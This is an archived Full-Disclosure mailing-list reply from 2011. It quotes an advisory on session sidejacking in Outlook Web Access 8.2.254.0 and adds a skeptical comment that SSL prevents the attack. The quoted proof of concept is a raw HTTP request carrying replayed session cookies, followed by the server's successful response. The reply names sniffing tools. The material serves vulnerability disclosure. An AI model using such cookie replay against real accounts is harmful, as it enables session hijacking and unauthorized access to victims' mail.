On Tue, Oct 25, 2011 at 8:26 PM, information security < [email protected]> wrote:
> > ============================================================================== > > Microsoft Outlook Web Access Session > sidejacking/Session Replay Vulnerability > > =============================================================================== > > by > > Asheesh Kumar Mani Tripathi > > > # code by Asheesh kumar Mani Tripathi > > # email [email protected] > > > # Credit by Asheesh Anaconda > > #Date 25th Oct 2011 > > > #Product Outlook Web Access 8.2.254.0 > > > > #Vulnerability > SideJacking is the process of sniffing web cookies, then replaying them to > clone another user's web session. Using a cloned web session, the jacker can > exploit the victim's previously-established site access > > #Impact > This allows attackers that can read the network traffic to intercept all > the data that is submitted to the server or web pages viewed by the client. > Since this data includes the session cookie, it allows him to impersonate > the victim, even if the password itself is not compromised. > > > > #Proof of concept > > > > ======================================================================================================================== > > Request > > ======================================================================================================================== > GET /owa/?ae=Folder&t=IPF.Note&a= HTTP/1.1 > Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, > application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, > application/x-shockwave-flash, application/vnd.ms-excel, > application/vnd.ms-powerpoint, application/msword, application/x-mfe-ipt, > */* > Referer: https://xxxwebmail.xxx.xxx/owa/ > Accept-Language: en-in > User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; > SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR > 3.5.30729; FDM; .NET CLR 3.0.30729; .NET4.0C) > Accept-Encoding: gzip, deflate > Host: xxxwebmail.xxx.xxx > Connection: Keep-Alive > Cookie: sessionid=49307edc-0f26-4dae-95f8-02d3dc6ad8a3:000; > cadata="25HxHgvnciGT/BOV1+yiA+HThFiE6kBtFXSjqAF0B5vvPAIKu7PA8tzKUCnW9N4Ao9E1WSzUeA27dLBgx"; > UserContext=e8997d6036554ada88a62dc9f2cf65d3 > > > > ======================================================================================================================== > > Response > > ======================================================================================================================== > > HTTP/1.1 200 OK > Cache-Control: no-cache > Pragma: no-cache > Content-Length: 58676 > Content-Type: text/html; charset=utf-8 > Expires: -1 > Server: Microsoft-IIS/7.0 > X-AspNet-Version: 2.0.50727 > X-OWA-Version: 8.2.254.0 > X-UA-Compatible: IE=EmulateIE7 > X-Powered-By: ASP.NET > Date: Tue, 25 Oct 2011 15:00:01 GMT > > #If you have any questions, comments, or concerns, feel free to contact me. > > > > Probably i can't understeand. Is there truly someone so crazy to don't use ssl for the owa access ? SSL stop sidejacking, and tool - nice FWIW - as hamster and ferret just for example. Best Regards > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
